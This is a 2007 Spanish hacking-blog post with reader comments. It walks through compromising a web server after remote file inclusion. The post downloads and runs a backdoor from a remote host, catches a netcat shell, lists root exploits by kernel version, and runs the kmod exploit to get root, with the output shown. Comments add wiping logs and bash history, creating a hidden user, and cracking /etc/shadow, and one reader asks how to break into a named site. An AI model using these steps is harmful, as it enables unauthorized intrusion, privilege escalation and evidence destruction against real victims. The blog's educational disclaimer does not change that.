Mar
19
Conectando Backdoor
CategorÃas: Asaltando los sistemas, General, Trabajando en Linux, Trabajo en Windows |
Enviado por: ansatsu
(3 artÃculos) |
Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero…
nos fijamos que carpetas tienen permisos (casi siempre es en tmp)
find -perm 777
ya que nos encontramos en la carpeta vulnerable hacemos esto
cd /tmp
ahora estamos en /tmp bien, tenemos permisos para descargar cosas y ejecutarlas , nos disponemos a hacerlo
cd /tmp;wget web/backdoor/5553; chmod 777 5553; ./5553
Lo que hicimos fue, descargarlo (wget) darle permisos al archivo (chmod 777) y ejecutarlo (./5553), ahora esta trabajando sobre el puerto 5553
ahora nos abrimos el netcat,y de esta maneraestamos diciendole al netcat que se ponga a la escucha del puerto 5553 y que nos devuelva la shell
-vv -l -p 5553
nc
Cmd line: -vv -l -p 5553
listening on [any] 5553 …
Ya que nos devuelve la shell, nos fijamos que kernel lleva
uname -a;pwd;id
sabiendo su version sabras que r00t exploit usar, les dejo la lista para cada una…
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
ya sabiendo que exploit usar, hacemos casi lo mismo que con el backdoor, lo descargamos,
wget laweb.com/exploit/kmod
Connecting to laweb.com:80… connected!
HTTP request sent, awaiting response… 200 OK
Length: 14,860 [text/plain]0K ………. …. 100% @ 70.79 KB/s
23:26:39 (70.45 KB/s) - `kmod’ saved [14860/14860]
, se sube, y ahora viene lo bueno le damos permisos y lo ejecutamos
chmod 777 kmod; ./kmod
si nos fue bien saldra algo como esto
chmod 777 kmod; ./kmod
[+] Attached to 30330
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0×40011aed
[+] Now wait for suid shell…
sh-2.05#
sh-2.05# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys)4(adm),6(disk),10(wheel)
y bueno ahora somos r00t, ya sabran ustedes que hacer, en la proxima entrega les dire como hacer mass deface
SaLuDoS
Últimas entradas:
- Phising y Pharming
- Como Hackear una red wifi.
- Como guardar un sitio web con teleport by rush.
- Hacker se manifiesta en la web de la camara diputados de mexico.
- Que es el phishing?
- Funcionamiento y prevencion de VIRUS!
- FIREWALL [Explicativos, Definiciones, Como funcionan]
- Abierto el registro en el Blog
- Virtual Machine Exchange Server 2007 SP1 Beta
- Intell Hyper Sped
Comentarios
Entrada escrita en el dÃa Lunes, Marzo 19th, 2007 a las 12:32 am en las categorÃas Asaltando los sistemas, General, Trabajando en Linux, Trabajo en Windows. Puedes encontrar las respuestas a este tema desde el RSS 2.0 feed. Puedes dejar una respuesta o hacer un trackback a tu página web.
7 Comentarios
Importante!
Los autores de este blog pretenden informar sobre seguridad, vulnerabilidades, técnicas hack, hablar sobre lo último en hacking...
Las herramientas, trucos, comandos, artÃculos... explicados en este blog NUNCA deberán
ser usados de forma maligna para delinquir o dañar a terceros.
No nos hacemos responsables de la mala interpretación ni del mal uso
de cualquier contenido del blog.
Todo lo que se habla en este blog está en internet (o proviene de alguno de los autores) y se puede consultar de forma libre. Si obtienes información de este blog para tu espacio, página web, blog... no olvides ponernos como fuente :).Acerca de
El Blog del Hacker es una web llevada por usuarios de ForoHack.com perteneciente a la web ElHacker.com
Si quieres colaborar con nosotros lo puedes hacer de forma abierta en nuestros foros y siendo un usuario frecuente podrás ser Autor de este blog.
El objetivo principal de este blog es dar a conocer desde nuestro propio punto de vista el hacking en la red para Windows o Linux, conocer como funcionan las cosas, hacer más segura la red encontrando vulnerabilidades,... nunca para hacer el mal, estafar, ni nada parecido. Siempre de buen rollo =) Cuanto más se hable de forma abierta sobre estos temas más usuarios y empresas los conocerán y menos nos afectarán (será más segura la red)Últimos Comentarios
- Super usuario dentro de Linux
06/24/2008 06:59 pm
11 Comentarios - Phising y Pharming
06/24/2008 06:31 pm
294 Comentarios - Como Hacer una envenenacion ARP en una Red
04/08/2008 08:55 pm
17 Comentarios - Hablemos de Wifislax
04/08/2008 03:22 pm
312 Comentarios - MaS…Comandos MS DOS.
04/08/2008 01:35 pm
41 Comentarios - Que es un ataque RFI(Remote File Inclusion)
04/08/2008 01:25 pm
457 Comentarios - Injection HTML
04/08/2008 01:19 pm
42 Comentarios - Glosario sobre terminos
04/04/2008 09:16 pm
77 Comentarios
Entradas más populares
- Super usuario dentro de Linux
Feeds e Información
- Registrarse
que 1337 eres, esa es la forma mas sencilla de obtener r00t pero ahora que tal si tiene el kernel mas nuevo o en dado caso no funcionan los exploits?
bien para eso se usa el razonamiento , y lo mas sencillo de hacer es un ‘ps aux’ para ver los servicios que corre y las versiones junto con el usuario que lo esta ejecutando, entonces alli viene otra forma de hacerlo que es parecido acomo lo explica statik(ansatsu) Xd nada mas buscar un exploit para el software que eligas junto con su version … algo sencillo no?
ahora si quieren algo mas interesante es borrar logs para que no queden huellas…. es muy trillado pero util.
supongamos que enemos el usuario no esta por demas ejecutar ‘/dev/null > ~/.bash_history’ , en donde se encuentran la mayoria de los logs es en /var/log/
tambien algo util seria agregar un usuario osea ya teniendo r00t suponiendo que ya lo consiguieron ‘adduser’ ese seria el comando dirijiendolo a una direccion no comun por ejemplo /home/ pero hacer esto no me convenze mucho , asi que seria mejor crackear la cuentade un usuario ya existente leyendo el archivo /etc/shadow utilizando la famosa herramienta john the ripper y listo teniendo crackeada la cuenta de r00t y de algun usuario normalya no necesitarian el uso de exploits para obtenerlo y asi van asegurando las cosas Xd
G00D
ejecuto el exploit (digamos ptrace-kmod) y se queda colgado en “[+] Now wait for suid shell…” saben por que?
Usa mejor el dc o algun similar k sea de coneccion inversa…
PD: Ansatsu eres un traidor =(
oi m ekivoke)) pense k t has kedao en cnoect…
posiblemente xk el kernel no es vulnrebale…
-_- el dc es el mejor que hay
Hola amigos no soy muy diestro con lo que es ser un hacker pero de verdad me gustaria aprender, sobre todo me interesa hacer un backdoor a una pagina llamada pacinosadventure ya que me gusta el material que contiene esa pagina, espero que alguien me pueda indicar como entrarle a esa pagina y sacarle todo el material que tienen alojado no pido que lo hagan por mi pero si que me indiquen como hacerlo para aprender y tener buenos conocimientos.
Saludos.